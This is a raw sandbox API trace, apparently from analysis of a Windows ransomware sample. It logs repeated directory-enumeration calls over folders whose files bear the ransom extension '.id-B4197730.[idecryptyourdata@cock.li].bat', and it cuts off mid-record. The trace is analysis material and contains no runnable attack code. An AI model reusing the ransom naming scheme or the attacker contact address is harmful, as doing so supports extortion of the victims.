ftLastWriteTime.dwLowDateTime=0xfd7a2240, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xf24, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.702] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6bd59c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6bd59c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd6bd59c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x139b6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.702] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6e378c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6e378c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd6e378c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.702] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6e378c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6e378c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd6e378c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.702] FindClose (in: hFindFile=0x728188 | out: hFindFile=0x728188) returned 1 [0155.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.703] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1041", cAlternateFileName="")) returned 1 [0155.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.703] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1041\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728348 [0155.706] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.706] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd6e378c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd6e378c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd83ad9c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x2874, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.706] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd7a2240, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd7a2240, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8149fa, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x10b86, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.706] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd434d45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd434d45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd45af2a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3e58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.706] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd434d45, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd434d45, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd45af2a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3e58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.706] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0155.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.707] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1042", cAlternateFileName="")) returned 1 [0155.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.707] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x727e48 [0155.709] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.709] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd83ad9c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd83ad9c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8d361e, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3274, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.709] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd83ad9c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd83ad9c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd860e43, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xffd6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.710] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd45af2a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd45af2a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd481149, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.710] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd45af2a, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd45af2a, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd481149, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x3c58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.710] FindClose (in: hFindFile=0x727e48 | out: hFindFile=0x727e48) returned 1 [0155.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.711] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1043", cAlternateFileName="")) returned 1 [0155.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.711] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x727fc8 [0155.712] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.713] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd860e43, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd860e43, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8ad2b7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xec4, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.713] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8ad2b7, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8ad2b7, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfdd9813b, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x13816, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.713] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8870a3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8870a3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8ad2b7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.713] FindNextFileW (in: hFindFile=0x727fc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8870a3, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8870a3, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd8ad2b7, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.713] FindClose (in: hFindFile=0x727fc8 | out: hFindFile=0x727fc8) returned 1 [0155.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.714] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1044", cAlternateFileName="")) returned 1 [0155.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.714] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728208 [0155.717] FindNextFileW (in: hFindFile=0x728208, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.717] FindNextFileW (in: hFindFile=0x728208, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd8d361e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd8d361e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd91f985, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0xcd4, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.717] FindNextFileW (in: hFindFile=0x728208, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd91f985, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd91f985, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd9b852d, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x136c6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.717] FindNextFileW (in: hFindFile=0x728208, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd53fe4c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd53fe4c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd53fe4c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.717] FindNextFileW (in: hFindFile=0x728208, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd53fe4c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd53fe4c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd53fe4c, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4658, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.717] FindClose (in: hFindFile=0x728208 | out: hFindFile=0x728208) returned 1 [0155.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.718] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1045", cAlternateFileName="")) returned 1 [0155.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.718] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x728008 [0155.721] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="..", cAlternateFileName="")) returned 1 [0155.721] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd99237e, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd99237e, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda50d7a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x10b4, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="EULART~1.BAT")) returned 1 [0155.721] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd9b852d, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd9b852d, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfda2ab27, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x142c6, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="LOCALI~1.BAT")) returned 1 [0155.722] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd53fe4c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd53fe4c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd565f3a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 1 [0155.722] FindNextFileW (in: hFindFile=0x728008, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xfd53fe4c, ftCreationTime.dwHighDateTime=0x1d5038d, ftLastAccessTime.dwLowDateTime=0xfd53fe4c, ftLastAccessTime.dwHighDateTime=0x1d5038d, ftLastWriteTime.dwLowDateTime=0xfd565f3a, ftLastWriteTime.dwHighDateTime=0x1d5038d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName="SetupResources.dll.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="SETUPR~1.BAT")) returned 0 [0155.722] FindClose (in: hFindFile=0x728008 | out: hFindFile=0x728008) returned 1 [0155.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0155.722] FindNextFileW (in: hFindFile=0x6ba130, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="1046", cAlternateFileName="")) returned 1 [0155.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44f0060 [0155.723] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe725, dwReserved1=0x3ef, cFileName=".", cAlternateFileName="")) returned 0x727e48 [0155.725] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, 